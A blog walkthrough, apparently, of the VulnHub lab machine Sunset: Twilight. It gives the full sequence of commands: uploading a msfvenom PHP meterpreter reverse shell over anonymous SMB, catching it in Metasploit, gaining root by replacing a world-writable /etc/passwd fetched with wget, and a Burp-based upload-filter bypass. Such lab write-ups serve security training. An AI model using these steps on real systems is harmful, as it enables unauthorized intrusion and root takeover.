zoukankan      html  css  js  c++  java

  • PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT

    猫宁~~~

    地址:https://www.vulnhub.com/entry/sunset-twilight,512/

    关注工具和思路。

    nmap 192.168.43.0/24
    靶机IP
    192.168.43.164

    nmap -A -p1-65535 192.168.43.164

    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    25/tcp open smtp Exim smtpd 4.92
    80/tcp open http Apache httpd 2.4.38 ((Debian))
    139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
    3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    8080/tcp open http-proxy PHP cli server 5.5 or later
    63525/tcp open http PHP cli server 5.5 or later

    enum4linux 192.168.43.164
    WRKSHARE Disk Workplace Share. Do not access if not an employee.

    smbclient //192.168.43.164/WRKSHARE,无密码登录
    smb: >
    cd varwwwhtml
    smb: varwwwhtml>

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

    smb下上传muma.php
    smb: varwwwhtml> put muma.php

    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.43.154
    set lport 4444
    run

    访问http://192.168.43.164/muma.php,反弹shell

    shell
    python -c "import pty;pty.spawn('/bin/bash')"
    www-data@twilight:/var/www/html$

    cd /home
    显示存在miguel的用户
    cat /etc/passwd
    miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

    ls -al /etc/passwd,有读写权限
    -rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

    攻击机执行
    openssl passwd -1 -salt useruser 123456

    将靶机/etc/passwd复制到本地
    最后一行添加
    useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

    python3 -m http.server 80

    wget http://192.168.43.154/passwd -O /etc/passwd

    su useruser
    id
    uid=0(root) gid=0(root) groups=0(root)

    利用上传接口获取shell

    dirb http://192.168.43.3/

    http://192.168.43.3/gallery/

    http://192.168.43.3/gallery/original/,可以查看文件目录,例如上传的muma.php

    重命名muma.php为muma.php.pjpeg

    上传,burpsuite抓包,
    Content-Type: image/jpeg
    文件名重新修改为muma.php

    上传成功

    http://192.168.43.3/gallery/original/muma.php

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost 192.168.43.154
    set lport 4444
    run

    成功获取shell
  • 相关阅读:
    【案例】ora600
    Oracle 10046 event
    Oracle redo与undo浅析
    BUFFER CACHE和SHARED POOL原理
    oracle体系结构基础
    Oracle-buffer cache、shared pool
    获取oracle数据库对象定义
    ORA-20011
    expdp/impdp中NETWORK_LINK参数使用
    day03-Python基础
  • 原文地址:https://www.cnblogs.com/landesk/p/13688068.html
Copyright © 2011-2022 走看看